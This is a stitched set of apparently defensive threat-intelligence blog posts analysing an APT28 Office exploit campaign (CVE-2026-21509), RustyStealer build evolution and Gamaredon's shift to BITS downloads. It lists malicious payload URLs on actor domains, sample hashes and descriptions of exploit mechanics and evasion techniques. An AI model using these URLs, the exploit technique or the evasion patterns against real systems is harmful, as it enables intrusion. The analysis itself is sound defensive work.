APT28: Geofencing as a Targeting Signal (CVE-2026-21509 Campaign)

by Robin Dost


EDIT: 04.02.2026:
I have YARA Rules available for detection, contact me at contact@robin-dost.de if you need them.

After publishing this article, I received technical feedback regarding the root cause of CVE-2026-21509. Based on that input, I corrected several parts of the analysis.

Update Notes:
The vulnerability does not rely on malformed OLE objects, and WebDAV is not part of the exploit primitive. CVE-2026-21509 is caused by an allowlist gap around Shell.Explorer.1, which Office still instantiates. WebDAV is only used as a delivery mechanism.
The article has been updated accordingly.


Since the beginning of this year, we have again observed an increased number of attacks by APT28 targeting various European countries. In multiple campaigns, the group actively leverages the Microsoft Office vulnerability CVE-2026-21509 as an initial access vector.

This article focuses on how CVE-2026-21509 is used in practice, how relevant IOCs can be extracted efficiently from weaponized Word documents and how the actors own geofencing can be leveraged to infer operational target regions.

Before diving into the analysis, a brief look at CVE-2026-21509 itself.

Understanding CVE-2026-21509 (Click)

CVE-2026-21509 comes down to a simple allowlist gap in Office.

Microsoft has been blocking browser OLE objects like Shell.Explorer and Shell.Explorer.2 for years. Shell.Explorer.1 just never made it onto that list.
Attackers embed a Shell.Explorer.1 OLE object inside an RTF document.
When Word parses the file, the object gets reconstructed and instantiated normally, because from Offices point of view it is still considered allowed.
No macros. No scripts. No fancy exploit chain.
Just a forgotten COM class.
Once loaded, the embedded browser object calls Navigate() and points to a remote resource, usually a .lnk file, which then becomes the actual execution vector.
The document itself carries no payload.
Its only purpose is to reach a state where Shell.Explorer.1 is active and allowed to fetch external content.
Variations of this technique have been public since at least 2016-2018.
CVE-2026-21509 merely formalizes Microsoft finally acknowledging that this specific ProgID should probably have been blocked a long time ago.

tldr;

APT28 abuses CVE-2026-21509 by embedding a forgotten OLE browser object (Shell.Explorer.1) into RTF documents.
Office happily instantiates it, the object navigates to a remote .lnk, and thats your execution path.
An allowlist gap that somehow survived for years.
The documents themselves contain no payload.
They only exist to get Office into a state where external shortcut files can be fetched. From there, the real infection chain starts.

Analyzed Samples

For this analysis, I looked at the following samples:

HashDownload
c91183175ce77360006f964841eb4048cf37cb82103f2573e262927be4c7607fDownload
5a17cfaea0cc3a82242fdd11b53140c0b56256d769b07c33757d61e0a0a6ec02Download
b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546Download
fd3f13db41cd5b442fa26ba8bc0e9703ed243b3516374e3ef89be71cbf07436bDownload
969d2776df0674a1cca0f74c2fccbc43802b4f2b62ecccecc26ed538e9565eaeDownload

When I receive potentially malicious Word documents, my first step is usually to run oleid. In most common malicious documents, this already reveals macros, external references or other active content.

In this case, oleid reports a clean file. No macros, no external relationships, no obvious indicators.

This is expected.

The document is not a classic OLE container but an RTF file. In RTF, embedded objects are stored as hexadecimal data inside the document body using control words such as \object and \objdata. These objects do not exist as real OLE structures until Word parses the document and reconstructs them in memory.

oleid operates at the container level. It can only detect features that already exist as structured objects in the file. Since the embedded OLE data is still plain text at this stage, there is nothing for oleid to flag.

The exploit surface of CVE-2026-21509 only becomes visible after this reconstruction step. Tools like rtfobj replicate this part of WordS parsing logic by extracting and rebuilding the embedded objects from the RTF stream.

rtfobj -s all b2ba51b4491da8604ff9410d6e004971e3cd9a321390d0258e294ac42010b546.doc

Once reconstructed, the embedded objects resolve to Shell.Explorer.1. Some tools flag the CLSID as unknown, but Windows loads it normally. The containers themselves are valid OLE objects. The vulnerability is triggered solely because this specific ProgID is still allowed.


After extracting the embedded objects, I inspected the resulting files using xxd. At this stage, strings did not yield anything particularly useful, which is not surprising given that the document is not designed to carry a readable payload.

From this data, the following strings could be extracted:


file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org/buch/pol/Downloads/document.LnK?init=1
file://wellnessmedcare.org@ssl/cz/Downloads/document.LnK?init=1
file://freefoodaid.com@80/documents/2_2.lNk?init=1


Why file://…/davwwwroot/…lnk appears in these samples

Some in-the-wild samples use paths like:

file://wellnessmedcare.org/davwwwroot/pol/Downloads/document.lnk

This is more an operational choice, then a technical requirement of CVE-2026-21509.
The same behavior can be triggered using plain HTTP or HTTPS URLs.
The exploit primitive is simple: the embedded Shell.Explorer.1 object calls Navigate() to a remote URI.
What happens next is handled by the legacy Internet Explorer engine (ieframe.dll), which does not implement modern protections such as SmartScreen or Smart Application Control.
WebDAV mainly provides delivery convenience.
It exposes remote files as filesystem-like objects via the Windows WebClient service, but it does not change the exploit mechanics.
As already mentioned, the Word document itself contains no payload and performs no execution.
Its only purpose is to instantiate Shell.Explorer.1 and trigger navigation to a remote shortcut file.
The .lnk becomes the actual execution vector. When accessed, the user is prompted to open or save the file, and any follow-on activity happens outside the document.
The query parameter is client-side only and used to avoid caching. It has no functional relevance for the server.

Identifying Targets

While analyzing the documents and extracted URLs, it became apparent that they reference potential target regions:

  • /cz/ -> Czech Republic
  • /buch/ -> Bucharest / Romania
  • /pol/ -> Poland

Additional indicators inside the Word documents further support this assessment:

  • Romanian language content
  • References to Ukraine
  • Mentions of Slovenia
  • EU-related context

None of this is accidental.

At this point, the next step is validation. Russian threat actors are known to rely heavily on geofencing and APT28 is no exception. Fortunately, this behavior can be turned into a useful source of intelligence for us ^-^

Turning Geofencing into Intelligence

The first step was to take a closer look at the domains extracted from the samples:

wellnessmedcare.org193.187.148.169
freefoodaid.com159.253.120.2

What stands out here is the choice of hosting locations.
Both IP addresses resolve to providers in Romania and Moldova. It is reasonable to assume that these locations were selected based on the campaigns intended target regions.

Next, I attempted to replicate the WebDAV requests generated by Windows in order to test the observed geofencing behavior.
To do this, I executed the document in a sandbox and captured the resulting network traffic.

Geofence Analysis

To validate the geofencing, I needed to determine which proxy locations were required to access the malicious resources without being blocked.
After identifying suitable proxies, I performed test requests using a custom script, once without a proxy and once using a Romanian proxy.

Without proxy:

With proxy:

The result is fairly clear. Requests originating from outside the expected regions are rejected with HTTP 403, while requests routed through a Romanian proxy succeed. This pattern can be used to validate likely operational target regions.

Out of 114 tested countries, only three were allowed access: Czech Republic, Poland and Romania. This aligns perfectly with the indicators observed earlier in the documents and URLs.

As this example shows, defensive measures such as geofencing can provide valuable intelligence when analyzed properly. Even access control mechanisms can leak information about an actors operational focus if you know where to look.
The second domain, freefoodaid.com, was already offline at the time of analysis. Given how short-lived APT28 infrastructure tends to be, this is hardly surprising. It is reasonable to assume that similar geofencing behavior would have been observable there as well, but for demonstration purposes, the remaining data is more than sufficient.

How to protect against these attacks

Update Microsoft Office and enforce a structured update routine.
Treat unexpected Word documents as untrusted and have them analyzed before opening them.
(or stop using windows :3)

Conclusion

CVE-2026-21509 works because it fits neatly into how Office processes documents today.
The exploit relies on Office instantiating an allowed OLE object during normal parsing, not on macros or embedded payloads, which makes it easy to overlook during initial analysis.
The tradecraft follows a familiar pattern.
Remote shortcut files and strict geofencing have been used by APT28 before and continue to show up in current campaigns.
WebDAV appears here mainly as a delivery detail.
The technique is stable, requires little user interaction, and sidesteps many modern Office protections by falling back to legacy browser behavior.
At the same time, this setup exposes useful signals.
Geofencing decisions, hosting locations and access behavior provide insight into intended target regions when tested systematically.

In this case, the infrastructure behavior aligns closely with the indicators found inside the documents.
From an analytical POV, the value lies less in the exploit itself and more in what can be inferred from how it is deployed and constrained.

RustyStealer: Your Compiler Is Snitching on You


by Robin Dost

As already mentioned in my last MuddyWater article, I originally planned to take a closer look at the remaining RustyWater samples in the hope of finding additional leftover artefacts. But: writing a pure “let’s grep a few more binaries for leftovers” follow-up article sounded painfully boring, both to read and to write. So instead of doing that, I decided to version the individual samples properly and build a small change-tracking timeline around them.

Mostly out of curiosity, partly out of stubbornness.
At least this way we get something that resembles actual analysis rather than archaeological string hunting.

Before diving into version diffs and timelines, it’s worth briefly grounding what we’re actually dealing with here, without turning this into a full-blown reverse engineering novella.

RustyStealer (sometimes referenced as RustyWater, Archer RAT or related variants in public reporting) is a Rust-based information stealer / RAT that has been observed in MuddyWater-attributed campaigns. In practice it behaves like a fairly typical post-compromise implant: basic host reconnaissance, security product awareness, persistence via registry, C2 communication and modular task execution. Nothing magical, nothing revolutionary, just a modernized tooling stack implemented in Rust instead of the usual C/C++ ecosystem. Here’s an article from cloudseek.com if you are interested in the details of it’s deliver and execution nature.


And that’s exactly where this article deliberately does not go: this is not a line-by-line teardown of every decoding routine, syscall wrapper or math loop. There are already reports on the internet that lovingly explain how a single function increments a counter.

What I’m interested in instead is how this thing evolves over time and how to track it

How do the binaries change between builds?
Which libs appear or disappear?
When does the architecture shift?
Where do experiments get rolled back?
Which parts get hardened, obfuscated or simplified?

The goal is to treat this malware family more like a software project with a messy commit history than a static artifact. By correlating compile timestamps, dependency fingerprints, fuzzy hashes, embedded artefacts and targeted code diffs, we can reconstruct a surprisingly coherent development timeline and extract signals about tooling maturity, experimentation phases and operational priorities .

And honestly: that’s way more fun than grepping strings all day and more useful for my threat actor research

For the analysis I used the following samples:

HashDate
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd08.01.2026
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b806822091408.01.2026
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f5808.01.2026
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e8310808.01.2026
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c7910.01.2026

My First Step: I always start with the most low-effort signal: raw strings.
Sometimes you get lucky and developers leave behind absolute paths, usernames, toolchain artefacts or other accidental breadcrumbs.

The first thing I wanted to verify was whether any additional user paths were embedded in the samples:

for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'C:')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done 

And yes, in two of the binaries we do indeed find another leftover artefact:

C:\Users\Bruno\Desktop\art.exe
C:\Users\Jacob\...

Just to be clear: the developer is almost certainly not named Bruno/Jacob.
This is simply the username of the build environment used at that time. Still, it gives us a nice anchor point when correlating samples later on.

Dependency extraction and library fingerprinting:

Next, I wanted to extract the dependency information from the binaries:

# get llvm strings
for x in *.exe; do strings "$x" | r="$(strings "$x" | grep 'llvm')"; if ! [ -z "$r" ]; then echo "$x $r\n"; fi ; done
# get crates with version and write to file sample.exe.strings
for x in *.exe; do strings "$x" | grep "crates\.io-" | cut -d'\' -f5 | sort | uniq >> "$x.strings" ;  done

This gives us a list of Rust crates and libraries that were present at build time:

From this output I consolidated a full list of all dependencies observed across all samples.
It already allows a first sanity check: are all samples built from the same dependency set or do we see deviations?

In total, the consolidated list contains 50 libraries, however, each individual sample only exposes around 44-45 crates.
That already tells us that not all builds are identical.

Here is the full list of observed libraries:

LibraryVersion
aead0.5.2
aes0.8.4
aes-gcm0.10.3
atomic-waker1.1.2
base640.22.1
bytes1.10.1
cipher0.4.4
ctr0.9.2
futures-channel0.3.31
futures-core0.3.31
futures-util0.3.31
generic-array0.14.7
h20.4.12
hashbrown0.15.5
http1.3.1
httpparse1.10.1
http-body-util1.7.0
hyper1.7.0
hyper-tls0.6.0
hyper-utils0.1.16
icu_collections2.0.0
icu_normalizer2.0.0
idna1.1.10
indexmap2.11.0
ipnet2.11.0
iri-string0.7.8
mio1.0.4
native-tls0.2.14
percent-encoding2.3.2
rand0.6.5
rand_core0.4.2
rand_hc0.1.0
rand_jitter0.1.4
reqwest0.12.23
schannel0.1.27
slab0.4.11
smallvec1.15.1
socket20.6.0
tokio1.47.1
tokio-native-tls0.3.1
tokio-util0.7.16
tower0.5.2
universal-hash0.5.1
url2.5.7
utf8_iter1.0.4
want0.3.1
windows-registry0.5.3
winreg0.55.0
rustc-demangle0.1.24
rustc-demangle0.1.26

Since we now know that differences exist, I built a per-sample matrix to visualize which libraries appear in which binary:

This makes deviations immediately visible without having to manually diff text dumps.

Compile timestamps

Before grouping anything, I also checked when the individual binaries were compiled.

This can be extracted using:

for x in *.exe; do printf "$x"; objdump -x "$x" | grep "Time/Date"; don

Result:

File HashCompile Date
ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914Tue Sep 23 10:44:52 2025
e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbdSun Oct 19 21:17:34 2025
e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108Sun Nov 16 23:41:42 2025
a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79Sun Nov 16 23:41:42 2025
7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58Mon Jan 5 06:33:07 2026
TLSH similarity analysis

As a final preprocessing step I generated TLSH hashes for all samples.

TLSH is a fuzzy hashing algorithm that does not aim for exact equality, but instead quantifies structural similarity between files.
Unlike cryptographic hashes, TLSH allows us to estimate how closely two binaries resemble each other internally even if they differ in resources, padding, timestamps or small code changes.

For our malware analysis purpose, this is especially useful when clustering variants, detecting rebuilds and separating development branches.

To make the distances reproducible, I wrote a small script that computes TLSH values directly from the binaries and performs pairwise comparisons:

Clustering the samples

With all of this data available, we can now perform a reasonably robust clustering of the samples

The key point here is that no single metric is deciding on its own. Instead, the correlation of multiple independent signals matters:

  • TLSH similarity
  • Compile timestamps
  • Library fingerprints
  • Embedded user artefacts
Cluster 1: Core codebase

The first cluster represents the actual core of the codebase and contains the samples:

  • e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd
  • e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e83108
  • a2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c79

All three share identical lib dependencies and are compiled close together in time, two of them even share the exact same compile timestamp. One sample also contains the user artefact "Bruno", which further hints to a consistent build environment.

Despite moderate TLSH distance to some variants, the internal similarity inside this cluster remains high enough to confidently assume a shared codebase.

Cluster 2: Early feature branch

A second, clearly separable cluster consists solely of:

  • ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b8068220914

This sample extends the otherwise stable library stack with an additional winreg dependency while remaining TLSH-close to the core samples.
Combined with its earlier compile timestamp, i think this a temporary feature branch or experiment rather than a fully independent development line.

Cluster 3: Later modernization branch

The third cluster is represented by:

  • 7523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f58

The build differs by multiple additional libraries and introduces a newer version of rustc-demangle.
Additionally, a different username ("Jacob") appears in the artefacts.
While the TLSH distance still places this sample within the same family, it consistently sits outside the tighter core cluster range.
Taken together, this strongly indicates a later development branch with an updated toolchain and likely expanded functionality

Overall, this results in a three-tier model:

  • A stable core cluster forming the technical baseline
  • An early feature branch with minimal extension
  • A later modernization branch with a changed toolchain and build environment

My clustering is not driven by hash similarity alone, but only becomes reliable through the combined temporal, structural and artefact based corelation. It also provides insight into development practices, build discipline and potential role separation within the development process of the malware

Version mapping

Based on this clustering, I derived the following version mapping:

VersionSample (SHA256)Compile DateClusterBesonderheitenDeveloper
v0.9ddc6e6c76ac325d89799a50dffd11ec69ed3b5341740619b8e595b806822091423.09.2025Registry-Branch+ winreg library (Feature-Experiment)unknown
v1.0e081bc408f73158c7338823f01455e4f5185a4365c8aad1d60d777e29166abbd19.10.2025CoreBaseline ToolchainBruno
v1.1e61b2ed360052a256b3c8761f09d185dad15c67595599da3e587c2c553e8310816.11.2025CoreParallel Build, stabiler StackBruno
v1.1ba2001892410e9f34ff0d02c8bc9e7c53b0bd10da58461e1e9eab26bdbf410c7916.11.2025CoreParallel Build (gleicher Timestamp)Bruno
v2.07523e53c979692f9eecff6ec760ac3df5b47f172114286e570b6bba3b2133f5805.01.2026Jacob-BranchNeue Libs + neue rustc-demangleJacob

At this point we already have a solid structural overview without having touched the actual code yet. This part comes next.

For the code comparison I use Ghidras Version Tracking module. The versions will be analyzed in the following pairs:

v0.9 <-> v1.0
v1.0 <-> v1.1
v1.1 <-> v2.0

So three comparisons in total which honestly is still a very manageable workload

Let’s get started 🙂

Version Tracking workflow

I won’t go into a full tutorial on how Ghidras Version Tracking works. Instead, I’ll briefly outline my simple workflow for today.

First, I set the confidence filter to:

-1.0 -> 0.950

Everything above that can usually be assumed identical across samples. I select all those findings and accept them in bulk.

For the remaining findings, I set up a small quality-of-life shortcut:

SHIFT + T = Assign Tag

Then I filter the results by:

  • Tag (ascending)
  • Type (ascending)
  • Status (ascending)

and tighten the confidence filter slightly to:

-1.0 → 0.95

This gives me a clean view of all unresolved function-level differences without assigned tags, exactly the changes that matter most when identifying structural evolution.

It looks roughly like this:

The workflow is simple:

  • Select the next finding
  • Open code comparison (SHIFT + C)
  • If identical -> accept (SHIFT + A)
  • If different -> assign a tag for later analysis (SHIFT + T)

Once accepted or tagged, the finding disappears from the filtered view and I repeat the process.

I iterate this until all relevant changes are reviewed and documented.


RustyStealer: Evolution from v0.9 to v2.0

What changed, what failed and what the developer learned

During a longitudinal analysis of multiple RustyStealer builds, four development stages become visible for me: an early baseline version (v0.9), a cleanup iteration (v1.0), a short-lived performance refactor (v1.1) and a more fundamental architectural shift in v2.0.

Rather than showing linear feature growth, the samples show a realistic iterative engineering process with experimentation, rollback and eventual consolidation toward stealth and reliability.

This analysis focuses on behavioral deltas inferred from import-level changes and binary artifacts.


Version 0.9: Early baseline and rough edges

The earliest observed build (v0.9) represents a relatively raw implementation.

Notable characteristics:

  • Dependency artifacts included unused crates such as winreg / windows-registry ( i guess early experimentation or leftover scaffolding)
  • No meaningful behavioral differences compared to later v1.0 builds
  • No advanced memory manipulation or cryptographic primitives observed
  • Limited internal abstraction and minimal architectural complexity

From a development POV, v0.9 looks like a staging build that still contained residual dependencies and experimental code paths that were not yet cleaned up.


Version 1.0: Cleanup and stabilization

The transition from v0.9 to v1.0 did not introduce meaningful functional changes. The most visible difference was the removal of unused dependency artifacts (such as the winreg crate) without any observable change in imports or runtime behavior.

This looks more like a dependency cleanup rather than a behavioral refactor

Key observations:

  • No changes in imported Windows APIs
  • No observable change in capabilities or execution flow
  • Binary differences consistent with rebuild noise and dependency graph cleanup

This phase reflects basic project hygiene rather than feature development.


Version 1.1: Performance experiment and internal refactor

Version 1.1 marks the first technically ambitious change

Major changes observed:

Introduction of asynchronous and overlapped file I/O:

  • ReadFile, NtReadFile
  • GetOverlappedResult, CancelIo
  • Event-based synchronization (CreateEventW, WaitForMultipleObjects)

Migration to modern Windows path resolution via SHGetKnownFolderPath.

Explicit memory cleanup for shell APIs using CoTaskMemFree.

Removal of host fingerprinting:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

This version appears to have attempted:

  • Faster and more scalable file harvesting.
  • Cleaner filesystem abstraction.
  • Reduced behavioral noise by temporarily disabling host profiling.

However, asynchronous I/O pipelines significantly increase complexity and often cause instability in realworld environments
This version looks more like a technical experiment rather than a long term production design for me

Additional findings from later code diffs

Looking at later builds and comparing them back to this branch reveals several important follow-up changes that appear to originate from the 1.1 refactor.

String handling and Defender artefacts

Older builds still expose cleartext strings such as direct Windows Defender directory paths, making static detection trivial.
In later builds these strings disappear entirely and are reconstructed at runtime using multiple XOR-based decoding routines and different key constants.

I believe the outcome of the 1.1 refactor was the realization that static strings were becoming a liability, leading to systematic runtime string decryption in subsequent versions.

Collection handling and stability

Later builds include additional safety checks when aggregating dynamic collections (explicit overflow protection when joining result sets)
The same logic exists in earlier builds but is less defensive and less structured.

This points to stability issues encountered when processing larger data sets, which maybe were discovered during or shortly after the scalability experiments introduced in version 1.1.

Modular architecture continuity

Both older and newer builds continue to reference internal Rust modules such as:

  • src\modules\persist.rs
  • src\modules\interface.rs
  • src\modules\information.rs
  • src\modules\detect_av.rs

It confirms that the internal refactor in 1.1 successfully established a modular layout that later versions could iterate on without further structural changes.

Toolchain and build artefacts

Later samples expose more Rust toolchain artefacts (stable-x86_64 paths and related metadata) and show noticeable hash divergence despite similar functionality.
This looks like a change in compiler version or build environment after this refactor phase, which may also explain subtle behavioral and binary layout differences between closely related samples.

My take

Version 1.1 looks like the point where the developers started stress testing their own architecture.

They might have pushed performance and concurrency, simplified some noisy host profiling and cleaned up API usage.
The follow-up changes visible in later diffs show that this experiment exposed two main pain points:

  • Static strings and predictable artefacts were too easy to signature.
  • Increased scale and concurrency exposed stability issues in collection handling.

Instead of doubling down on complex async I/O, later versions appear to focus more on obfuscation, robustness and operational reliability, while keeping the modular structure introduced here.

imo 1.1 feels less like a production release and more like a learning phase that shaped the technical direction of everything that followed.


Version 2.0: Architectural consolidation and stealth optimization

Version 2.0 represents a clear update in development priorities.

Instead of further expanding the async pipeline, the developer reverted many of the experimental components and focused on stealth, operational control and internal maturity.

Major changes observed:

Removal of asynchronous file pipeline

All overlapped I/O and event-based sync primitives present in v1.1 have been fully removed in v2.0 and later builds. No replacement async scheduling mechanisms (IOCP, APCs, worker pools or deferred execution patterns) are observable in the call graph.

The runtime execution flow is now strictly sequential, with simplified synchronization primitives replacing the earlier concurrency model.
It looks like the experimental async pipeline was abandoned in favor of a more predictable and operationally stable execution model.
It reduces architectural complexity, lowers race condition risk and improves long-term stability across victim environments.
All overlapped I/O and event-based synchronization APIs were removed, indicating that the v1.1 experiment was abandoned in favor of a simpler and more predictable execution model.

Reintroduction of host fingerprinting

Host identification APIs returned:

  • GetComputerNameExW
  • GetUserNameW
  • NetGetJoinInformation

Focus on victim profiling, campaign correlation and backend attribution logic
The temporary removal in v1.1 now appears to have been an experimental privacy / noise reduction phase rather than a permanent design direction.

Migration towards native NT APIs

Several subsystems were migrated towards native system calls:

  • Named pipes moved from CreateNamedPipeW to NtCreateNamedPipeFile
  • File handling introduced NtOpenFile

This reduces visibility to user-mode API hooking and increases resistance against common EDR userland instrumentation.

Introduction of cryptographic randomness and entropy hardening

Version 2.0 introduces a dedicated entropy generation pipeline based on SystemFunction036 (RtlGenRandom), replacing the previously implicit and largely deterministic behavior.

Rather than simply requesting random bytes, the implementation builds a full entropy pool that combines cryptographically secure randomness with adaptive jitter-based sampling and internal quality validation.
The generated entropy is statistically evaluated at runtime and rejected if it fails basic stability and distribution thresholds.
Only entropy that passes these health checks is propagated further into the execution flow.

The call chain shows that the generated randomness directly feeds into subsequent runtime decoding routines, where multiple obfuscated data blocks are reconstructed through XOR-based transformations and dynamic key. In earlier versions, these decode paths relied almost entirely on static constants and predictable transformations.
In v2.0, parts of this process become entropy-dependent and therefore non-deterministic across executions

From an operational perspective this has several implications:

  • Runtime decoding behavior becomes less reproducible for static analysis and sandbox instrumentation.
  • Signature-based detection and clustering become more fragile, as internal state and derived values differ per execution.
  • Correlation across samples using hash similarity, instruction-level signatures or deterministic unpacking pipelines becomes significantly harder.
  • The malware gains a higher degree of resilience against emulation environments with weak or manipulated entropy sources.

While the mechanism could theoretically support use cases such as object naming, session identifiers or cryptographic material, the integration into the decode pipeline indicates more that the primary motivation is obfuscation hardening and stealth rather than feature expansion

It marks a shift in development priorities: the developers invest in making existing functionality harder to observe, reproduce and classify

Memory protection manipulation (VirtualProtect)

VirtualProtect appears in v2.0, but not as a generic “unpacking” indicator.

It is used to flip a read-only dispatch table to writable just long enough to store dynamically resolved API pointers, then lock it back down.
Thats consistent with the shift towards runtime API resolving and NT-level calls: fewer static imports, less signature surface and a resolver layer that is harder to tamper with or trivial hook

Internal synchronization refactor

Thread state handling was refactored away from TLS primitives and migrated towards modern synchronization APIs (InitializeCriticalSectionEx)

I think it’s for architectural cleanup and improved concurrency control.

Obfuscation hardening and decoder abstraction

Compared to version 1.1, version 2.0 further abstracts string decryption and reconstruction logic.
Previously visible XOR decoders with fixed constants and static data offsets were refactored into more generic reconstruction helpers and indirect decode routines.

This significantly reduces static signature stability and increases the effort required for automated clustering and YARA-style detection.

Improved memory lifecycle management and cleanup paths

Version 2.0 introduces more explicit cleanup sequences, callback-based destructors and tighter buffer lifecycle handling.

Multiple teardown paths now explicitly free dynamically allocated buffers, invoke destructor callbacks and normalize internal state after large collection operations.
It might be an effort to reduce memory leaks, crash probability and long-running instability during high-volume data processing.

Build pipeline evolution

Build artifacts show a different Rust toolchain and build environment compared to version 1.1.
Toolchain paths shifted from shared “Archer” layouts towards user-local rustup environments, explaining observed TLSH divergence despite largely stable runtime behavior.

This reflects internal “”””build pipeline”””” changes rather than functional malware changes.

Summary

Version 2.0 prioritizes:

  • Simplification and rollback of risky experimental I/O designs
  • Stronger stealth via native API usage and obfuscation hardening
  • Improved runtime stability and memory hygiene
  • Reintroduction of host profiling for operational correlation
  • Internal architectural consolidation rather than feature expansion

Overall, this release reflects a stabilization phase where operational reliability and detection resistance outweigh rapid feature development


Conclusion

If there’s one takeaway from this exercise, it’s that even relatively “boring” commodity implants become surprisingly interesting once you stop treating them as static blobs and start treating them like evolving software projects.

By correlating build artefacts, dependency drift, fuzzy hashes and targeted code diffs, we can reconstruct a fairly coherent development timeline for RustyStealer without having to reverse every single function into oblivion. We see experimentation phases (hello async pipeline), rollbacks when ideas don’t survive real-world friction, hardening towards stealth (dynamic API resolution, entropy injection) and the usual toolchain churn that comes with real developers shipping real code, even if that code happens to be malware.
None of this magically turns RustyStealer into some nextgen cyber superweapon. It’s still fundamentally a fairly standard implant doing fairly standard implant things.
Also it’s a nice reminder that “grep strings > extract a few IOCs > call it a day” only gets you so far. If you actually want to understand how an actor operates, what they experiment with and where their engineering effort goes, you have to look at trends, not snapshots.
Which admittedly takes more time, more coffee and slightly more patience than copy-pasting hashes into VirusTotal buuuut the payoff is a much clearer picture of what’s really going on under the hood.

There’s also a more general lesson in all of this imo

If the goal is to actually understand a threat actor, not just label a sample and move on, then obsessing over individual functions, opcodes and micro-optimizations only gets you part of the way.
That level of detail is useful, but it doesnt tell you how the tooling evolves, where engineering effort is invested, which ideas get abandoned or how operational priorities shift over time.
These signals live in the truly boring parts: build artefacts, dependency drift, architectural refactors, version churn and the occasional accidental breadcrumb left behind in a binary or wherever.
When you line those up over multiple samples, you start seeing intent and process instead of isolated behaviour and this exactly what we want ^-^

Gamaredon: Now Downloading via Windows Updates Best Friend “BITS”

by Robin Dost


There’s yet another update in Gamaredons GamaLoad scripts, which pushed me to write this article and to slightly revisit my previous post Defending Against Gamaredon: Practical Controls That Actually Work.

In this article, I distinguish between GamaLoad and Pterodo. I still consider GamaLoad a transitional stage, primarily implemented as a defensive layer to slow down analysis rather than as a fundamentally new capability.
That said, there are visible changes both in payload delivery and in obfuscation.

I’ll mainly focus on what has changed since my last posts. If you’re interested in the broader context and historical behavior, have a look at the previous articles first.

For this analysis, I pulled the latest Gamaredon sample with the hash:

3538618e0ae0f7e73d96843d90323178b1d434262a074fc24be8e36283e7dd92

and dropped it straight into my tracking framework.

From a delivery perspective, not much has changed compared to Gamaredons last shift. The victim still receives a RAR archive as an attachment. When opened or extracted, it drops an HTA file into the Startup folder, infecting the system on the next reboot.
A few minutes later, my tracking system already picked up the first fresh GamaLoad samples for analysis.

When comparing these new samples to the December 2025 batch, one thing immediately stood out:
they are almost twice as large and noticeably more obfuscated.

(Left column: line count, right column: hash+date)

The obfuscation hasn’t just increased (which, honestly, doesn’t help much given how terrible Gamaredons obfuscation usually is :D), but it has also become slightly smarter.

Historically, their scripts contained tons of junk loops that served absolutely no purpose and could simply be deleted during manual deobfuscation. In the newer samples, however, more variables defined inside those junk blocks are later reused in the actual execution flow.

So if you’re still deobfuscating by hand or your automation isn’t fully mature yet, you’ll want to be a bit more careful here.

(Variable larkxGg is defined in the junk loop, but used after it)

The Interesting Part

A few days ago, I published an article showing how surprisingly easy it is to defend against Gamaredon by blocking a small set of Windows tools such as mshta.exe or MSXML2.XMLHTTP.
If you’re honest about it, Gamaredon’s tooling is… let’s say “not exactly impressive”. Blocking a handful of abused LOLBins already makes payload delivery painfully difficult for them. Their development is slow, incremental, and often fairly predictable.

Well, i guess they noticed.

The defensive measures described in that article have now been bypassed.
Don’t worry though, we’ll adjust accordingly 😁

Fallback on Fallback: Now Featuring BITS


The new GamaLoad script still relies on a familiar fallback structure to retrieve and execute payloads from their delivery infrastructure.

Conceptually, this is very simple: the script keeps trying different URLs until one successfully returns a payload. If everything fails, an empty string is returned.

What’s new is that this fallback logic now has… another fallback.

If no payload stage can be retrieved via the usual mechanisms, the script switches to downloading the payload using bitsadmin.

What is bitsadmin?

bitsadmin is a Windows utility used to control the Background Intelligent Transfer Service (BITS), which provides reliable background downloads and uploads.
Attackers abuse it as a Living-off-the-Land Binary (LOLBin) to quietly retrieve payloads without dropping additional tooling onto disk.

From an attacker’s perspective, BITS has some very attractive properties:

  • resilient background transfers
  • native proxy support
  • high reliability on unstable networks
  • no obvious “malware-looking” process tree

exactly the kind of boring enterprise plumbing malware loves to hide in ^^


Why Gamaredon Switched to BITS

For years, Gamaredon heavily relied on classic LOLBins such as mshta.exe and MSXML2.XMLHTTP for payload delivery and execution.
By now, these techniques are:

  • blocked by default in many environments (AppLocker, ASR rules, EDR hardening)
  • trivial to detect via signatures and behavior
  • operationally noisy (suspicious child processes, script artifacts, obvious telemetry)

BITS lives in a much more comfortable gray zone:

  • it supports persistent and robust downloads
  • it is actively used by Windows itself (Windows Update, Defender, Office, etc.)
  • blocking it outright often creates operational risk in enterprise environments
  • its network traffic looks boring and legitimate (svchost.exe, Microsoft-like headers)
  • it works reliably behind proxies and restrictive networks

if your previous delivery pipeline keeps getting kicked in the teeth by defenders, BITS is a logical next step even for an actor whose tooling evolution is usually measured in geological time.

Is This a Problem?

Not really.

In my article Defending Against Gamaredon: Practical Controls That Actually Work, I now show how you can effectively mitigate BITS abuse without breaking normal business operations.

So yes: Gamaredon adapted.
And yes we’ll adapt again. That’s kind of the point. 🙂

MuddyWater: When Your Build System Becomes an IOC – “Jacob”


by Robin Dost

EDIT 2026-01-18: I published a follow-up article analyzing the evolution and version history of the latest RustyStealer samples, focusing on change tracking, tooling evolution, and architectural shifts across multiple builds

Today I was bored, so I decided to take a short break from Russian threat actors and spend a day with our friends from Iran instead.
